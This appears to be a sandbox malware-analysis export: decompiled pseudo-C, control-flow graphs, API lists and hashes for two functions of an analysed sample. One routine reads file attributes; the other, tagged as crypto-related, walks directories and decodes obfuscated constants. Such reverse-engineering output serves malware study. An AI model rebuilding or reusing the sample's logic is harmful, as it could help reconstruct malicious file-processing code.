                                    control_flow_graph 2784 8561b5-85621d 2785 85621f-856221 2784->2785 2786 85622b-856230 2784->2786 2785->2786 2787 856223-856226 2785->2787 2788 856232-856235 2786->2788 2789 85624c-85624e 2786->2789 2792 8564d8-8564f5 call 86e288 2787->2792 2788->2789 2793 856237-85623d 2788->2793 2790 856254-85625d 2789->2790 2791 8564d6 2789->2791 2794 8562cf-8562f8 call 8564fd 2790->2794 2795 85625f-856262 2790->2795 2791->2792 2797 856243-856249 2793->2797 2798 85623f-856241 2793->2798 2809 8564cc-8564cd call 855d9c 2794->2809 2810 8562fe-85631f call 855c8d 2794->2810 2799 856264-85626a 2795->2799 2800 856270-85627f GetFileAttributesExW 2795->2800 2797->2789 2798->2789 2798->2797 2799->2800 2803 85626c-85626e 2799->2803 2804 856281-856287 GetLastError 2800->2804 2805 85628c-856297 2800->2805 2803->2794 2803->2800 2804->2792 2807 8562a0-8562c3 2805->2807 2808 856299-85629e 2805->2808 2807->2791 2813 8562c9 2807->2813 2808->2794 2808->2807 2815 8564d2-8564d4 2809->2815 2816 856325-85632b 2810->2816 2817 856422-85642f GetFileInformationByHandle 2810->2817 2813->2794 2815->2792 2818 856386-856388 2816->2818 2819 85632d-85632f 2816->2819 2820 856435-856470 2817->2820 2821 856353-85635b GetLastError 2817->2821 2823 8563d0-8563d2 2818->2823 2824 85638a-8563ad 2818->2824 2819->2818 2822 856331-856351 2819->2822 2825 8564c1-8564c3 2820->2825 2826 856472-85647a 2820->2826 2821->2809 2822->2821 2842 856360-856383 2822->2842 2827 8563d4-8563f0 2823->2827 2828 856417-856419 2823->2828 2824->2821 2840 8563af-8563cd 2824->2840 2829 8564c9-8564cb 2825->2829 2830 85641b-85641d 2825->2830 2831 85647c-85649c FindFirstFileExW 2826->2831 2832 8564ba 2826->2832 2827->2821 2843 8563f6-856414 2827->2843 2828->2817 2828->2830 2829->2809 2830->2809 2831->2821 2836 8564a2-8564b8 FindClose 2831->2836 2833 8564be 2832->2833 2833->2825 2836->2833 2840->2823 2842->2818 2843->2828
                                    C-Code - Quality: 45%
                                    			E008561B5(void* __ecx) {
				intOrPtr _v8;
				signed int _v16;
				char _v24;
				signed int _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v60;
				void _v72;
				intOrPtr _v104;
				struct _BY_HANDLE_FILE_INFORMATION _v128;
				intOrPtr _v140;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v172;
				intOrPtr _v728;
				void _v764;
				long _v765;
				long _v772;
				void* _v776;
				char _v780;
				signed int _v784;
				WCHAR* _v788;
				void* __ebp;
				signed int _t117;
				signed int _t118;
				signed int _t120;
				signed char _t121;
				long _t122;
				long _t129;
				void* _t146;
				signed int _t149;
				void* _t159;
				void* _t165;
				signed int _t172;
				signed int _t177;
				signed int _t186;
				WCHAR* _t188;
				void* _t190;
				intOrPtr* _t192;
				long _t194;
				long _t195;
				signed int _t197;
				signed int _t202;

				_t177 = _t202;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t177 + 4));
				_t200 = (_t202 & 0xfffffff8) + 4;
				_push(0xffffffff);
				_push(0x8943aa);
				_push( *[fs:0x0]);
				_push(_t177);
				_t117 =  *0x8b2014; // 0x61232540
				_t118 = _t117 ^ (_t202 & 0xfffffff8) + 0x00000004;
				_v32 = _t118;
				_push(_t118);
				 *[fs:0x0] =  &_v24;
				_t120 =  *(_t177 + 0x10);
				_t188 =  *(_t177 + 8);
				_t180 = _t120 & 0x00000001;
				_t192 =  *((intOrPtr*)(_t177 + 0xc));
				_t121 = _t120 & 0xfffffffe;
				_v788 = _t188;
				_v772 = _t192;
				_v765 = _t180;
				 *(_t177 + 0x10) = _t121;
				if(_t180 == 0 || (_t121 & 0x00000004) == 0) {
					_t186 =  *(_t177 + 0x14);
					if((_t121 & 0x00000002) != 0 && _t186 != 0xffffffff && ((_t186 & 0x00000400) == 0 || _t180 == 0)) {
						_t121 = _t121 & 0xfffffffd;
						 *(_t192 + 0x10) = _t186;
						 *(_t177 + 0x10) = _t121;
					}
					if(_t121 == 0) {
						L44:
						_t122 = 0;
					} else {
						_v784 = _v784 & 0x00000000;
						if((_t121 & 0x0000002a) == 0 || _t186 != 0xffffffff && (_t186 & 0x00000400) != 0 && _t180 != 0) {
							L19:
							_t129 = E008564FD( &_v776, _t188, 0x80, (_t180 & 0x000000ff ^ 0x00000001) + 0x10 << 0x15); // executed
							_t190 = _v776;
							_t194 = _t129;
							if(_t194 == 0) {
								_t195 = L00855C8D(0x8b3954, L"kernel32.dll", "GetFileInformationByHandleEx", 0x855d5a);
								if(_t195 == 0x855d5a) {
									L34:
									if(GetFileInformationByHandle(_t190,  &_v128) == 0) {
										goto L24;
									} else {
										_t186 = _v772;
										_t180 = _v128.nFileIndexHigh;
										 *(_t186 + 0x10) = _v128.dwFileAttributes;
										 *_t186 = _v128.ftLastWriteTime;
										 *((intOrPtr*)(_t186 + 4)) = _v104;
										 *((intOrPtr*)(_t186 + 8)) = 0 + _v128.nFileIndexLow;
										asm("adc ecx, 0x0");
										_t197 =  *(_t177 + 0x10) & 0xffffffc5;
										 *((intOrPtr*)(_t186 + 0x18)) = _v128.nNumberOfLinks;
										 *(_t186 + 0xc) = _v128.nFileIndexHigh;
										if((_t197 >> 0x00000002 & 0x00000001) == 0) {
											L41:
											if(_t197 == 0) {
												goto L33;
											} else {
												_t194 = 0x32;
											}
										} else {
											if((_v128.dwFileAttributes >> 0x0000000a & 0x00000001) == 0) {
												 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
												goto L40;
											} else {
												_t146 = FindFirstFileExW(_v788, _v784,  &_v764, _v784, _v784, _t180);
												if(_t146 == 0xffffffff) {
													goto L24;
												} else {
													FindClose(_t146);
													_t180 = _v772;
													 *((intOrPtr*)(_v772 + 0x14)) = _v728;
													L40:
													_t197 = _t197 & 0xfffffffb;
													goto L41;
												}
											}
										}
									}
								} else {
									_t149 =  *(_t177 + 0x10);
									if(_t149 == 6 || (_t149 & 0x00000022) == 0) {
										L26:
										if((_t149 & 0x00000006) == 0) {
											L29:
											if((_t149 & 0x00000018) == 0) {
												L32:
												if(_t149 != 0) {
													goto L34;
												} else {
													L33:
													_t194 = 0;
												}
											} else {
												_v16 = 2;
												_t180 = _t195;
												 *0x89728c(_t190, 1,  &_v60, 0x18);
												if( *_t195() == 0) {
													goto L24;
												} else {
													_t180 = _v772;
													 *((intOrPtr*)(_t180 + 8)) = _v52;
													 *((intOrPtr*)(_t180 + 0xc)) = _v48;
													 *((intOrPtr*)(_t180 + 0x18)) = _v44;
													_t149 =  *(_t177 + 0x10) & 0xffffffe7;
													 *(_t177 + 0x10) = _t149;
													goto L32;
												}
											}
										} else {
											_v16 = 1;
											_t180 = _t195;
											 *0x89728c(_t190, 9,  &_v780, 8);
											_t159 =  *_t195();
											_v16 = _v16 | 0xffffffff;
											if(_t159 == 0) {
												goto L24;
											} else {
												_t180 = _v772;
												 *((intOrPtr*)(_t180 + 0x10)) = _v780;
												 *(_t180 + 0x14) = _v776;
												_t149 =  *(_t177 + 0x10) & 0xfffffff9;
												 *(_t177 + 0x10) = _t149;
												goto L29;
											}
										}
									} else {
										_v16 = _v16 & 0x00000000;
										_t180 = _t195;
										 *0x89728c(_t190, 0,  &_v172, 0x28);
										_t165 =  *_t195();
										_v16 = _v16 | 0xffffffff;
										if(_t165 != 0) {
											_t180 = _v772;
											 *((intOrPtr*)(_t180 + 0x10)) = _v140;
											 *_t180 = _v156;
											 *((intOrPtr*)(_t180 + 4)) = _v152;
											_t149 =  *(_t177 + 0x10) & 0xffffffdd;
											 *(_t177 + 0x10) = _t149;
											goto L26;
										} else {
											L24:
											_t194 = GetLastError();
										}
									}
								}
							}
							E00855D9C(_t180, _t186, _t190); // executed
							_t122 = _t194;
						} else {
							if(GetFileAttributesExW(_t188, 0,  &_v72) != 0) {
								_t180 = _v765;
								_t172 = _v72;
								if(_v765 == 0 || (_t172 & 0x00000400) == 0) {
									 *(_t192 + 0x10) = _t172;
									 *((intOrPtr*)(_t192 + 8)) = 0 + _v40;
									asm("adc ecx, 0x0");
									_t37 = _t177 + 0x10;
									 *_t37 =  *(_t177 + 0x10) & 0xffffffd5;
									 *_t192 = _v52;
									 *((intOrPtr*)(_t192 + 0xc)) = _v44;
									 *((intOrPtr*)(_t192 + 4)) = _v48;
									if( *_t37 == 0) {
										goto L44;
									} else {
										_t180 = _v765;
										goto L19;
									}
								} else {
									goto L19;
								}
							} else {
								_t122 = GetLastError();
							}
						}
					}
				} else {
					_t122 = 0x57;
				}
				 *[fs:0x0] = _v24;
				return E0086E288(_t122, _v32 ^ _t200);
			}
















































                                    0x008561b6
                                    0x008561b8
                                    0x008561b9
                                    0x008561c4
                                    0x008561c8
                                    0x008561ca
                                    0x008561cc
                                    0x008561d7
                                    0x008561d8
                                    0x008561df
                                    0x008561e4
                                    0x008561e6
                                    0x008561eb
                                    0x008561ef
                                    0x008561f5
                                    0x008561fa
                                    0x008561fd
                                    0x00856200
                                    0x00856203
                                    0x00856206
                                    0x0085620c
                                    0x00856212
                                    0x00856218
                                    0x0085621d
                                    0x0085622b
                                    0x00856230
                                    0x00856243
                                    0x00856246
                                    0x00856249
                                    0x00856249
                                    0x0085624e
                                    0x008564d6
                                    0x008564d6
                                    0x00856254
                                    0x00856254
                                    0x0085625d
                                    0x008562cf
                                    0x008562e9
                                    0x008562ee
                                    0x008562f4
                                    0x008562f8
                                    0x00856317
                                    0x0085631f
                                    0x00856422
                                    0x0085642f
                                    0x00000000
                                    0x00856435
                                    0x00856435
                                    0x0085643e
                                    0x00856444
                                    0x0085644a
                                    0x0085644f
                                    0x00856457
                                    0x0085645d
                                    0x00856460
                                    0x00856463
                                    0x00856468
                                    0x00856470
                                    0x008564c1
                                    0x008564c3
                                    0x00000000
                                    0x008564c9
                                    0x008564cb
                                    0x008564cb
                                    0x00856472
                                    0x0085647a
                                    0x008564ba
                                    0x00000000
                                    0x0085647c
                                    0x00856493
                                    0x0085649c
                                    0x00000000
                                    0x008564a2
                                    0x008564a3
                                    0x008564a9
                                    0x008564b5
                                    0x008564be
                                    0x008564be
                                    0x00000000
                                    0x008564be
                                    0x0085649c
                                    0x0085647a
                                    0x00856470
                                    0x00856325
                                    0x00856325
                                    0x0085632b
                                    0x00856386
                                    0x00856388
                                    0x008563d0
                                    0x008563d2
                                    0x00856417
                                    0x00856419
                                    0x00000000
                                    0x0085641b
                                    0x0085641b
                                    0x0085641b
                                    0x0085641b
                                    0x008563d4
                                    0x008563d9
                                    0x008563e4
                                    0x008563e6
                                    0x008563f0
                                    0x00000000
                                    0x008563f6
                                    0x008563f6
                                    0x008563ff
                                    0x00856405
                                    0x0085640b
                                    0x00856411
                                    0x00856414
                                    0x00000000
                                    0x00856414
                                    0x008563f0
                                    0x0085638a
                                    0x00856392
                                    0x0085639d
                                    0x0085639f
                                    0x008563a5
                                    0x008563a7
                                    0x008563ad
                                    0x00000000
                                    0x008563af
                                    0x008563af
                                    0x008563bb
                                    0x008563c4
                                    0x008563ca
                                    0x008563cd
                                    0x00000000
                                    0x008563cd
                                    0x008563ad
                                    0x00856331
                                    0x00856331
                                    0x00856341
                                    0x00856343
                                    0x00856349
                                    0x0085634b
                                    0x00856351
                                    0x00856360
                                    0x00856369
                                    0x00856372
                                    0x0085637a
                                    0x00856380
                                    0x00856383
                                    0x00000000
                                    0x00856353
                                    0x00856353
                                    0x00856359
                                    0x00856359
                                    0x00856351
                                    0x0085632b
                                    0x0085631f
                                    0x008564cd
                                    0x008564d2
                                    0x00856270
                                    0x0085627f
                                    0x0085628c
                                    0x00856292
                                    0x00856297
                                    0x008562a3
                                    0x008562ab
                                    0x008562b1
                                    0x008562b4
                                    0x008562b4
                                    0x008562b8
                                    0x008562bd
                                    0x008562c0
                                    0x008562c3
                                    0x00000000
                                    0x008562c9
                                    0x008562c9
                                    0x00000000
                                    0x008562c9
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00856281
                                    0x00856281
                                    0x00856281
                                    0x0085627f
                                    0x0085625d
                                    0x00856223
                                    0x00856225
                                    0x00856225
                                    0x008564db
                                    0x008564f5

                                    APIs
                                    • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 00856277
                                    • GetLastError.KERNEL32 ref: 00856281
                                    • ___std_fs_open_handle@16.LIBCPMT ref: 008562E9
                                    • GetLastError.KERNEL32 ref: 00856353
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$AttributesFile___std_fs_open_handle@16
                                    • String ID: GetFileInformationByHandleEx$kernel32.dll
                                    • API String ID: 1210884149-1782754588
                                    • Opcode ID: 1bb5b487e8470177d12dc5e9db7ab0e9e1e1e4a420c7df0155c971aa37d15a7d
                                    • Instruction ID: 306614fc684dc7e8df7096997afee1a4eed3b2e937ed898e0e2202c8a79f9a10
                                    • Opcode Fuzzy Hash: 1bb5b487e8470177d12dc5e9db7ab0e9e1e1e4a420c7df0155c971aa37d15a7d
                                    • Instruction Fuzzy Hash: A0A17B71A006199FDB24CF28C844BAAB7B4FF04325F5442A9EC25EB391E774DE59CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00829151 Relevance: 13.7, Strings: 10, Instructions: 1230COMMONCrypto
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3056 829151-8291ac call 890cfc call 82fec9 call 813174 call 82dd77 3065 8291b2-82931f call 818f5d * 2 call 82e8c7 call 82fa3b call 82e917 call 82fa3b call 82df41 * 5 call 82fec9 call 8130c8 call 82dd77 call 81a25a * 2 3056->3065 3066 82a311-82a327 call 82df41 3056->3066 3101 829321-829326 call 8116cb 3065->3101 3102 829328 3065->3102 3101->3102 3104 82932c-82932e 3102->3104 3106 829334-829341 call 812a7c 3104->3106 3107 82a2d9-82a2db 3104->3107 3117 829347-829399 call 812425 call 82e5d4 call 82ea7d 3106->3117 3118 82a299-82a2bd call 813112 3106->3118 3108 82a2e4-82a2ec 3107->3108 3109 82a2dd-82a2df call 8116cb 3107->3109 3112 82a2f3-82a30c call 82df41 * 3 3108->3112 3113 82a2ee call 8116cb 3108->3113 3109->3108 3112->3066 3113->3112 3132 829407 3117->3132 3133 82939b-8293ee call 812425 call 82e5d4 call 82ea7d 3117->3133 3125 82a2c2-82a2d4 3118->3125 3125->3104 3135 82940b-829410 3132->3135 3159 829402-829405 3133->3159 3160 8293f0-8293f9 call 812ac6 3133->3160 3136 829412-829426 call 82df41 3135->3136 3137 829429-82942b 3135->3137 3136->3137 3140 829444-829446 3137->3140 3141 82942d-829441 call 82dd77 3137->3141 3146 829448-829459 call 82df41 3140->3146 3147 82945c-829465 3140->3147 3141->3140 3146->3147 3151 829467-829476 call 82dd77 3147->3151 3152 82947b-82947f 3147->3152 3151->3152 3152->3118 3156 829485-8294bf 3152->3156 3157 8294c1-8294d3 call 86db91 3156->3157 3158 8294ff-829506 3156->3158 3157->3158 3169 8294d5-8294fe call 86dfe8 call 86db47 3157->3169 3162 829517-82956a call 8123eb call 82e5d4 call 82ea7d call 82df41 call 82dd77 3158->3162 3163 829508 3158->3163 3159->3135 3160->3132 3170 8293fb 3160->3170 3185 829570-8295d2 call 82e5d4 call 82e143 call 82df41 call 82d8d6 3162->3185 3186 8298f9-829912 3162->3186 3166 82950a-829515 3163->3166 3166->3162 3166->3166 3169->3158 3170->3159 3173 8293fd-829400 3170->3173 3173->3132 3173->3159 3215 8295e6-829616 call 82df41 call 82d960 call 82d8d6 3185->3215 3216 8295d4-8295e1 call 82e143 3185->3216 3188 829950-829958 3186->3188 3189 829914-829926 call 86db91 3186->3189 3192 82995a 3188->3192 3193 829969-8299b1 call 8123eb call 82e5d4 call 82ea7d 3188->3193 3189->3188 3198 829928-82994f call 86dfe8 call 86db47 3189->3198 3196 82995c-829967 3192->3196 3213 8299b3-829a13 call 82a3a4 call 82d2ae call 8123eb call 82e5d4 call 82ea7d 3193->3213 3214 829a15 3193->3214 3196->3193 3196->3196 3198->3188 3213->3214 3220 829a19-829a1e 3213->3220 3214->3220 3249 82962a-8296d4 call 82df41 call 82fec9 call 813225 call 82dd77 call 82fec9 * 2 call 813139 call 82dd77 * 2 3215->3249 3250 829618-829625 call 82e143 3215->3250 3216->3215 3223 829a20-829a33 call 82df41 3220->3223 3224 829a36-829a38 3220->3224 3223->3224 3225 829a51-829a53 3224->3225 3226 829a3a-829a4e call 82dd77 3224->3226 3234 829a55-829a66 call 82df41 3225->3234 3235 829a69-829a72 3225->3235 3226->3225 3234->3235 3240 829a74-829a83 call 82dd77 3235->3240 3241 829a88-829a8c 3235->3241 3240->3241 3246 829a92-829af2 call 82e5d4 call 82e143 call 82df41 call 82d8d6 3241->3246 3247 829e3e-829e64 3241->3247 3289 829b06-829b35 call 82df41 call 82d960 call 82d8d6 3246->3289 3290 829af4-829b01 call 82e143 3246->3290 3251 829e66-829e78 call 86db91 3247->3251 3252 829e9f-829ea6 3247->3252 3328 8296da-8297b0 call 82e5d4 call 82e917 call 82e981 call 82e917 call 82d9e5 call 82df41 * 4 call 82e0ab call 82e8c7 call 82e981 call 826a63 3249->3328 3329 829e28 3249->3329 3250->3249 3251->3252 3267 829e7a-829e9e call 86dfe8 call 86db47 3251->3267 3254 829eb7-829f0c call 8123eb call 82e5d4 call 82ea7d call 82df41 call 82dd77 3252->3254 3255 829ea8 3252->3255 3302 829f12-829f6e call 82e5d4 call 82e143 call 82df41 call 82d8d6 3254->3302 3303 82a297 3254->3303 3262 829eaa-829eb5 3255->3262 3262->3254 3262->3262 3267->3252 3314 829b37-829b44 call 82e143 3289->3314 3315 829b49-829bcc call 82df41 call 82fec9 call 813225 call 82dd77 call 82fec9 * 2 call 813139 3289->3315 3290->3289 3336 829f82-829fb1 call 82df41 call 82d960 call 82d8d6 3302->3336 3337 829f70-829f7d call 82e143 3302->3337 3303->3118 3314->3315 3366 829bd1-829bea call 82dd77 * 2 3315->3366 3412 8297b5-8298f4 call 82df41 call 82ec6b call 82fe0d call 82fe25 call 82ec6b call 82a328 call 82d2ae call 82e9ec call 82e917 call 82fa3b call 82e917 call 82d9e5 call 82df41 * 5 call 82e0ab * 2 3328->3412 3331 829e2a-829e39 call 82d9c4 3329->3331 3331->3118 3359 829fb3-829fc0 call 82e143 3336->3359 3360 829fc5-82a042 call 82df41 call 82fec9 call 813225 call 82dd77 call 82fec9 * 2 call 813139 3336->3360 3337->3336 3359->3360 3404 82a047-82a060 call 82dd77 * 2 3360->3404 3366->3329 3379 829bf0-829e19 call 82e5d4 call 82e917 call 82e981 call 82e917 call 82d9e5 call 82df41 * 4 call 82e0ab call 82e8c7 call 82e981 call 826a63 call 82df41 call 82ec6b call 82fe0d call 82fe25 call 82ec6b call 82a420 call 82d2ae call 82e9ec call 82e917 call 82fa3b call 82e917 call 82d9e5 call 82df41 * 5 call 82e0ab * 2 3366->3379 3530 829e1a-829e1e call 827009 3379->3530 3404->3329 3420 82a066-82a290 call 82e5d4 call 82e917 call 82e981 call 82e917 call 82d9e5 call 82df41 * 4 call 82e0ab call 82e8c7 call 82e981 call 826a63 call 82df41 call 82ec6b call 82fe0d call 82fe25 call 82ec6b call 82a49c call 82d2ae call 82e9ec call 82e917 call 82fa3b call 82e917 call 82d9e5 call 82df41 * 5 call 82e0ab * 2 3404->3420 3412->3530 3420->3303 3536 829e23-829e26 3530->3536 3536->3331
                                    C-Code - Quality: 79%
                                    			E00829151(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				void* _t554;
				void* _t556;
				void* _t558;
				void* _t559;
				void* _t561;
				intOrPtr _t568;
				signed int _t577;
				void* _t583;
				signed int _t585;
				void* _t586;
				signed int _t589;
				intOrPtr _t591;
				void* _t593;
				void* _t595;
				intOrPtr _t598;
				void* _t600;
				signed int _t602;
				signed int _t603;
				intOrPtr _t604;
				void* _t606;
				signed int _t608;
				void* _t619;
				void* _t623;
				signed int _t630;
				void* _t636;
				void* _t637;
				void* _t638;
				void* _t646;
				intOrPtr* _t658;
				void* _t661;
				void* _t662;
				void* _t664;
				char _t678;
				void* _t690;
				void* _t694;
				signed int _t701;
				void* _t706;
				void* _t707;
				void* _t708;
				void* _t716;
				intOrPtr* _t728;
				void* _t731;
				void* _t732;
				void* _t734;
				signed int _t747;
				signed int _t749;
				signed int _t751;
				signed int _t753;
				void* _t756;
				void* _t758;
				signed int _t761;
				signed int _t762;
				char _t763;
				void* _t776;
				void* _t780;
				void* _t787;
				void* _t792;
				void* _t793;
				void* _t794;
				void* _t802;
				intOrPtr* _t814;
				void* _t817;
				void* _t818;
				void* _t820;
				char _t833;
				signed int _t837;
				signed int _t839;
				signed int _t841;
				signed int _t843;
				void* _t846;
				void* _t849;
				char _t854;
				signed int _t898;
				signed int _t902;
				void* _t907;
				signed int _t908;
				void* _t911;
				signed int _t912;
				void* _t917;
				void* _t923;
				void* _t939;
				intOrPtr _t954;
				void* _t958;
				intOrPtr _t978;
				void* _t979;
				void* _t981;
				void* _t988;
				void* _t1004;
				intOrPtr _t1018;
				void* _t1022;
				intOrPtr _t1042;
				void* _t1043;
				signed int _t1047;
				void* _t1058;
				void* _t1074;
				intOrPtr _t1088;
				void* _t1092;
				intOrPtr _t1112;
				void* _t1113;
				void* _t1115;
				void* _t1121;
				void* _t1128;
				void* _t1129;
				char* _t1178;
				void* _t1179;
				void* _t1181;
				intOrPtr _t1183;
				signed int _t1186;
				signed int _t1187;
				signed int _t1190;
				signed int _t1191;
				signed int _t1193;
				signed int _t1194;
				signed int _t1199;
				signed int _t1201;
				signed int _t1203;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1216;
				char* _t1217;
				signed int _t1221;
				signed int _t1223;
				void* _t1224;
				void* _t1226;
				intOrPtr* _t1227;
				intOrPtr _t1229;
				void* _t1230;
				intOrPtr _t1232;
				void* _t1233;
				intOrPtr _t1234;
				void* _t1235;
				intOrPtr _t1237;
				intOrPtr _t1238;
				void* _t1239;
				intOrPtr _t1241;
				void* _t1249;

				L00890CFC(0x893f14, __ebx, __ecx, __edx);
				_t1227 = _t1226 - 0x1b0;
				_push(__ebx);
				_push(_t1179);
				 *((intOrPtr*)(_t1224 - 0x10)) = _t1227;
				 *(_t1224 - 0x1c) = 0;
				 *(_t1224 - 0x20) = 0;
				 *(_t1224 - 0x78) = 0;
				 *(_t1224 - 0x24) = 0;
				_push( *(_t1224 - 0x24));
				 *((intOrPtr*)(_t1224 - 4)) = 0;
				L0082FEC9(_t1224 + 8);
				 *((char*)(_t1224 - 4)) = 1;
				_t554 = E00813174(__ebx, _t1224 - 0x138, _t1179);
				 *((char*)(_t1224 - 4)) = 0;
				_t852 = _t554;
				L0082DD77(_t1224 - 0x138);
				_t1243 = _t554;
				if(_t554 == 0) {
					L84:
					_t556 = E0082DF41(_t1224 + 8);
					 *[fs:0x0] =  *((intOrPtr*)(_t1224 - 0xc));
					return _t556;
				}
				_t1128 = 9;
				_t1181 = L00818F5D(_t852, _t1224 - 0xb0, _t1128);
				_t1129 = 0xa;
				 *((char*)(_t1224 - 4)) = 2;
				_t558 = L00818F5D(_t852, _t1224 - 0x118, _t1129);
				 *((char*)(_t1224 - 4)) = 3;
				_t559 = E0082E8C7(_t852, _t1224 - 0x74, 0x8b2a8c, _t1181);
				 *((char*)(_t1224 - 4)) = 4;
				E0082FA3B(_t1224 - 0xe8,  *((intOrPtr*)(_t1224 - 0x44)), _t559, _t558, "\\");
				 *((char*)(_t1224 - 4)) = 5;
				_t561 = E0082E917(_t1224 - 0x40, _t1224 - 0xe8, _t1243, ".");
				_push(_t1181);
				_push(_t561);
				_push( *((intOrPtr*)(_t1224 - 0x44)));
				 *((char*)(_t1224 - 4)) = 6;
				E0082FA3B(_t1224 - 0x138);
				 *(_t1224 - 0x14) = 0xc00;
				 *(_t1224 - 0x1c) = 0xc00;
				E0082DF41(_t1224 - 0x40);
				E0082DF41(_t1224 - 0xe8);
				E0082DF41(_t1224 - 0x74);
				E0082DF41(_t1224 - 0x118);
				E0082DF41(_t1224 - 0xb0);
				_t854 = 0;
				_t568 = 0xf;
				 *((intOrPtr*)(_t1224 - 0xf0)) = 0;
				 *((intOrPtr*)(_t1224 - 0xec)) = _t568;
				 *((char*)(_t1224 - 0x100)) = 0;
				 *((intOrPtr*)(_t1224 - 0x4c)) = 0;
				 *((intOrPtr*)(_t1224 - 0x48)) = _t568;
				 *((char*)(_t1224 - 0x5c)) = 0;
				 *(_t1224 - 0x24) = 0;
				 *((char*)(_t1224 - 4)) = 0xe;
				L0082FEC9(_t1224 + 8);
				 *((char*)(_t1224 - 4)) = 0xf;
				E008130C8(0, _t1224 - 0x168, _t1224 + 8, _t1181, _t1243, _t1224 - 0xe8,  *(_t1224 - 0x24)); // executed
				L0082DD77(_t1224 - 0xe8);
				E0081A25A(_t1224 - 0xd0, _t1224 - 0x168);
				_t1182 =  *(_t1224 - 0xd0);
				_t1199 =  *(_t1224 - 0xcc);
				 *(_t1224 - 0x120) = _t1182;
				 *(_t1224 - 0x11c) = _t1199;
				E0081A25A(_t1224 - 0x18c, _t1224 - 0x168);
				_t889 =  *((intOrPtr*)(_t1224 - 0x188));
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0xd0], xmm0");
				_t577 = 0;
				 *(_t1224 - 0xd0) = 0;
				 *(_t1224 - 0xcc) = 0;
				if( *((intOrPtr*)(_t1224 - 0x188)) != 0) {
					E008116CB(_t889);
					_t577 = 0;
				}
				 *((char*)(_t1224 - 4)) = 0x13;
				while(_t1182 != _t577) {
					 *((char*)(_t1224 - 4)) = 0x14;
					_t583 = E00812A7C(_t854, _t1182, _t1182); // executed
					if(_t583 != 0) {
						L77:
						 *((intOrPtr*)(_t1224 - 4)) = 0x13;
						E00813112(_t854, _t1224 - 0x120, _t1182, _t1267); // executed
						_t1199 =  *(_t1224 - 0x11c);
						_t1182 =  *(_t1224 - 0x120);
						_t577 =  *(_t1224 - 0xd0);
						continue;
					}
					_t585 = _t1182 + 0x20;
					 *(_t1224 - 0x24) = _t585;
					_t898 = _t585;
					_t586 = E00812425(_t898, _t1224 - 0x118);
					_push(_t898);
					 *((char*)(_t1224 - 4)) = 0x15;
					_t1201 =  *(_t1224 - 0x14) | 0x00000001;
					 *(_t1224 - 0x1c) = _t1201;
					E0082E5D4(_t586, _t1224 - 0x74);
					 *((intOrPtr*)(_t1224 - 4)) = 0x16;
					_t1203 = _t1201 | 0x4002;
					 *(_t1224 - 0x14) = _t1203;
					 *(_t1224 - 0x1c) = _t1203;
					if(E0082EA7D(_t1224 - 0x74, 0x8a43ab, _t1182, _t1203) != 0) {
						L12:
						 *((char*)(_t1224 - 0x15)) = 1;
						L13:
						_t589 =  *(_t1224 - 0x14);
						if((_t589 & 0x00000008) != 0) {
							_t843 = _t589 & 0xfffffff7;
							 *(_t1224 - 0x14) = _t843;
							 *(_t1224 - 0x1c) = _t843;
							E0082DF41(_t1224 - 0xe8);
							_t589 =  *(_t1224 - 0x14);
						}
						if((_t589 & 0x00000004) != 0) {
							_t841 = _t589 & 0xfffffffb;
							 *(_t1224 - 0x14) = _t841;
							 *(_t1224 - 0x1c) = _t841;
							L0082DD77(_t1224 - 0xb0);
							_t589 =  *(_t1224 - 0x14);
						}
						if((_t589 & 0x00000002) != 0) {
							_t839 = _t589 & 0xfffffffd;
							 *(_t1224 - 0x14) = _t839;
							 *(_t1224 - 0x1c) = _t839;
							E0082DF41(_t1224 - 0x74);
							_t589 =  *(_t1224 - 0x14);
						}
						 *((intOrPtr*)(_t1224 - 4)) = 0x14;
						if((_t589 & 0x00000001) != 0) {
							_t837 = _t589 & 0xfffffffe;
							 *(_t1224 - 0x14) = _t837;
							 *(_t1224 - 0x1c) = _t837;
							L0082DD77(_t1224 - 0x118);
						}
						if( *((char*)(_t1224 - 0x15)) == 0) {
							goto L77;
						} else {
							 *((intOrPtr*)(_t1224 - 0x98)) = 0x47494162;
							 *((intOrPtr*)(_t1224 - 0x94)) = 0x4f6a0e40;
							 *((short*)(_t1224 - 0x90)) = 0x4f5a;
							_t1183 =  *((intOrPtr*)( *[fs:0x2c]));
							_t591 =  *0x8b5570; // 0x80000036
							 *((char*)(_t1224 - 0x8e)) = 0x2e;
							 *((intOrPtr*)(_t1224 - 0x28)) = _t1183;
							if(_t591 >  *((intOrPtr*)(_t1183 + 4))) {
								E0086DB91(_t591, 0x8b5570);
								_t1261 =  *0x8b5570 - 0xffffffff;
								_pop(_t1115);
								if( *0x8b5570 == 0xffffffff) {
									asm("movsd");
									asm("movsd");
									asm("movsw");
									asm("movsb");
									L0086DFE8(_t1115, _t1261, 0x89624a);
									 *_t1227 = 0x8b5570;
									L0086DB47();
									_t1183 =  *((intOrPtr*)(_t1224 - 0x28));
								}
							}
							if( *0x8b51ea == 0) {
								L28:
								_t902 =  *(_t1224 - 0x24);
								_t593 = E008123EB(_t902, _t1224 - 0xb0);
								_push(_t902);
